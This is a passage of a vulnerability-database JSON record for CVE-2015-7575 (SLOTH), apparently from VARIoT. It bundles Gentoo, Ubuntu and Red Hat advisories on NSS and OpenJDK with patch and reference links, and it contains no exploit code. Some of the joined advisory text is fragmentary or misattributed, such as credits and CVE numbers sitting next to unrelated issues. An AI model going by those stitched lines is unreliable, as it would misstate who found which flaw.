https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Mozilla Network Security Service (NSS): Multiple\n vulnerabilities\n Date: January 19, 2017\n Bugs: #550288, #571086, #604916\n ID: 201701-46\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NSS, the worst of which\ncould allow remote attackers to obtain access to private key\ninformation. \n\nBackground\n==========\n\nThe Mozilla Network Security Service (NSS) is a library implementing\nsecurity features like SSL v.2/v.3, TLS, PKCS #5, PKCS #7, PKCS #11,\nPKCS #12, S/MIME and X.509 certificates. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/nss \u003c 3.28 \u003e= 3.28\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NSS. Please review the\nCVE identifiers and technical papers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NSS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/nss-3.28\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-2721\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2721\n[ 2 ] CVE-2015-4000\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000\n[ 3 ] CVE-2015-7575\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7575\n[ 4 ] CVE-2016-1938\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938\n[ 5 ] CVE-2016-5285\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5285\n[ 6 ] CVE-2016-8635\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8635\n[ 7 ] CVE-2016-9074\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9074\n[ 8 ] SLOTH Attack Technical Paper\n http://www.mitls.org/pages/attacks/SLOTH\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201701-46\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--IaUA2rjNRE1qkoRse7wxSpqjKrtacOEtO--\n\n. \n\nMore information can be found at\nhttps://www.mitls.org/pages/attacks/SLOTH\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 2.12.20-8+deb7u5. 7) - x86_64\n\n3. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory page, listed in the References section. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-2884-1\nFebruary 01, 2016\n\nopenjdk-7 vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 7. \n\nSoftware Description:\n- openjdk-7: Open Source Java implementation\n\nDetails:\n\nMultiple vulnerabilities were discovered in the OpenJDK JRE related\nto information disclosure, data integrity, and availability. \n(CVE-2016-0483, CVE-2016-0494)\n\nA vulnerability was discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2016-0402)\n\nIt was discovered that OpenJDK 7 incorrectly allowed MD5 to be used\nfor TLS connections. If a remote attacker were able to perform a\nman-in-the-middle attack, this flaw could be exploited to expose\nsensitive information. (CVE-2015-7575)\n\nA vulnerability was discovered in the OpenJDK JRE related to\ninformation disclosure. An attacker could exploit this to expose\nsensitive data over the network. (CVE-2016-0448)\n\nA vulnerability was discovered in the OpenJDK JRE related to\navailability. An attacker could exploit this to cause a denial of\nservice. (CVE-2016-0466)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.15.10.1\n openjdk-7-jre 7u95-2.6.4-0ubuntu0.15.10.1\n openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.15.10.1\n openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.15.10.1\n openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.15.10.1\n\nUbuntu 15.04:\n icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.15.04.1\n openjdk-7-jre 7u95-2.6.4-0ubuntu0.15.04.1\n openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.15.04.1\n openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.15.04.1\n openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.15.04.1\n\nUbuntu 14.04 LTS:\n icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.14.04.1\n openjdk-7-jre 7u95-2.6.4-0ubuntu0.14.04.1\n openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.14.04.1\n openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.14.04.1\n openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.14.04.1\n\nThis update uses a new upstream release, which includes additional\nbug fixes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.0-openjdk security update\nAdvisory ID: RHSA-2016:0053-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0053.html\nIssue date: 2016-01-21\nCVE Names: CVE-2015-4871 CVE-2015-7575 CVE-2016-0402 \n CVE-2016-0448 CVE-2016-0466 CVE-2016-0483 \n CVE-2016-0494 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.0-openjdk packages that fix multiple security issues are\nnow available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having Critical security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\n\n3. Description:\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit. \n\nAn out-of-bounds write flaw was found in the JPEG image format decoder in\nthe AWT component in OpenJDK. A specially crafted JPEG image could cause\na Java application to crash or, possibly execute arbitrary code. An\nuntrusted Java application or applet could use this flaw to bypass Java\nsandbox restrictions. (CVE-2016-0483)\n\nAn integer signedness issue was found in the font parsing code in the 2D\ncomponent in OpenJDK. A specially crafted font file could possibly cause\nthe Java Virtual Machine to execute arbitrary code, allowing an untrusted\nJava application or applet to bypass Java sandbox restrictions. \n(CVE-2016-0494)\n\nIt was discovered that the JAXP component in OpenJDK did not properly\nenforce the totalEntitySizeLimit limit. An attacker able to make a Java\napplication process a specially crafted XML file could use this flaw to\nmake the application consume an excessive amount of memory. (CVE-2016-0466)\n\nA flaw was found in the way TLS 1.2 could use the MD5 hash function for\nsigning ServerKeyExchange and Client Authentication packets during a TLS\nhandshake. A man-in-the-middle attacker able to force a TLS connection to\nuse the MD5 hash function could use this flaw to conduct collision attacks\nto impersonate a TLS server or an authenticated TLS client. (CVE-2015-7575)\n\nMultiple flaws were discovered in the Libraries, Networking, and JMX\ncomponents in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass certain Java sandbox restrictions. (CVE-2015-4871,\nCVE-2016-0402, CVE-2016-0448)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. \n\nNote: This update also disallows the use of the MD5 hash algorithm in the\ncertification path processing. The use of MD5 can be re-enabled by removing\nMD5 from the jdk.certpath.disabledAlgorithms security property defined in\nthe java.security file. \n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1273859 - CVE-2015-4871 OpenJDK: protected methods can be used as interface methods via DirectMethodHandle (Libraries)\n1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)\n1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)\n1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)\n1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)\n1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)\n1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm\n\ni386:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-4871\nhttps://access.redhat.com/security/cve/CVE-2015-7575\nhttps://access.redhat.com/security/cve/CVE-2016-0402\nhttps://access.redhat.com/security/cve/CVE-2016-0448\nhttps://access.redhat.com/security/cve/CVE-2016-0466\nhttps://access.redhat.com/security/cve/CVE-2016-0483\nhttps://access.redhat.com/security/cve/CVE-2016-0494\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWoM9KXlSAg2UNWIIRAqEwAJwN75xhk+4gvMxjiZkEfLqpUobNvACeLWha\nqzRinbbktNyylx3SPUV5yWA=\n=ZO8E\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nThis update upgrades IBM Java SE 7 to versions 7 SR9-FP40 and 7R1 SR3-FP40. (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805,\nCVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842,\nCVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872,\nCVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903,\nCVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126,\nCVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376,\nCVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494,\nCVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427,\nCVE-2016-3443, CVE-2016-3449)\n\nRed Hat would like to thank Andrea Palazzo of Truel IT for reporting the\nCVE-2015-4806 issue. (CVE-2015-7575)\n\nYves Younan discovered that graphite2 incorrectly handled certain malformed\nfonts. (CVE-2016-1523)\n\nBob Clary, Christian Holler, Nils Ohlmeier, Gary Kwong, Jesse Ruderman,\nCarsten Book, and Randell Jesup discovered multiple memory safety issues\nin Thunderbird. (CVE-2016-1930)\n\nAki Helin discovered a buffer overflow when rendering WebGL content in\nsome circumstances", "sources": [ { "db": "NVD", "id": "CVE-2015-7575" }, { "db": "BID", "id": "79684" }, { "db": "VULMON", "id": "CVE-2015-7575" }, { "db": "PACKETSTORM", "id": "140618" }, { "db": "PACKETSTORM", "id": "135212" }, { "db": "PACKETSTORM", "id": "135339" }, { "db": "PACKETSTORM", "id": "135542" }, { "db": "PACKETSTORM", "id": "135340" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "136114" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-7575", "trust": 2.1 }, { "db": "BID", "id": "79684", "trust": 1.4 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036467", "trust": 1.1 }, { "db": "SECTRACK", "id": "1034541", "trust": 1.1 }, { "db": "VULMON", "id": "CVE-2015-7575", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140618", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135212", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135339", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135542", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135340", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136114", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7575" }, { "db": "BID", "id": "79684" }, { "db": "PACKETSTORM", "id": "140618" }, { "db": "PACKETSTORM", "id": "135212" }, { "db": "PACKETSTORM", "id": "135339" }, { "db": "PACKETSTORM", "id": "135542" }, { "db": "PACKETSTORM", "id": "135340" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "136114" }, { "db": "NVD", "id": "CVE-2015-7575" } ] }, "id": "VAR-201601-0016", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3478835966666667 }, "last_update_date": "2024-07-04T21:13:56.044000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Red Hat: Moderate: nss security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20160007 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20160008 - security advisory" }, { "title": "Red Hat: Moderate: gnutls security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20160012 - security advisory" }, { "title": "Ubuntu Security Notice: openssl vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2863-1" }, { "title": "Ubuntu Security Notice: nss vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2864-1" }, { "title": "Debian Security Advisories: DSA-3437-1 gnutls26 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=819c25e4161d9c59fbf9d403120315be" }, { "title": "Ubuntu Security Notice: gnutls26, gnutls28 vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2865-1" }, { "title": "Ubuntu Security Notice: firefox vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2866-1" }, { "title": "Debian Security Advisories: DSA-3436-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=07247103b9fb762bfde68fed155965f3" }, { "title": "Amazon Linux AMI: ALAS-2016-651", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-651" }, { "title": "Amazon Linux AMI: ALAS-2016-645", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-645" }, { "title": "Mozilla: Mozilla Foundation Security Advisory 2015-150", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2015-150" }, { "title": "Red Hat: CVE-2015-7575", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-7575" }, { "title": "Debian Security Advisories: DSA-3457-1 iceweasel -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d48a126fa6377735d59aba73766b6a48" }, { "title": "Ubuntu Security Notice: thunderbird vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2904-1" }, { "title": "Symantec Security Advisories: SA108 : Transcript Collision Attacks Against TLS 1.2 (SLOTH)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=0c68b89195c7cccd63c86c9e03beac4b" }, { "title": "Debian Security Advisories: DSA-3491-1 icedove -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=4a77c8f35d141b32b86ffec7b9604cd1" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2884-1" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720151203\u0027 Advisory Affects Tenable SecurityCenter", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-01" }, { "title": "Debian Security Advisories: DSA-3458-1 openjdk-7 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=40831417d121ab10d4dc7fc0d8144eac" }, { "title": "Debian Security Advisories: DSA-3465-1 openjdk-6 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=28d9723420cf12ab64c1ab4b2dc2c045" }, { "title": "Amazon Linux AMI: ALAS-2016-643", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-643" }, { "title": "Amazon Linux AMI: ALAS-2016-661", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-661" }, { "title": "Amazon Linux AMI: ALAS-2016-647", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-647" }, { "title": "Debian Security Advisories: DSA-3688-1 nss -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=373dcfd6d281e203a1b020510989c2b1" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "IBM: Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM Netezza Analytics for NPS", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36fc403a4c2c6439b732d2fca738f58" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=122319027ae43d6d626710f1b1bb1d43" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8" }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7575" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-19", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-7575" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2884-1" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2016:1430" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/79684" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2904-1" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0053.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-0055.html" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201701-46" }, { "trust": 1.1, "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1158489" }, { "trust": 1.1, "url": "https://developer.mozilla.org/docs/mozilla/projects/nss/nss_3.20.2_release_notes" }, { "trust": 1.1, "url": "http://www.mozilla.org/security/announce/2015/mfsa2015-150.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00007.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00166.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00101.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3465" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0054.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0049.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3457" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3491" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0056.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2016-0050.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00059.html" }, { 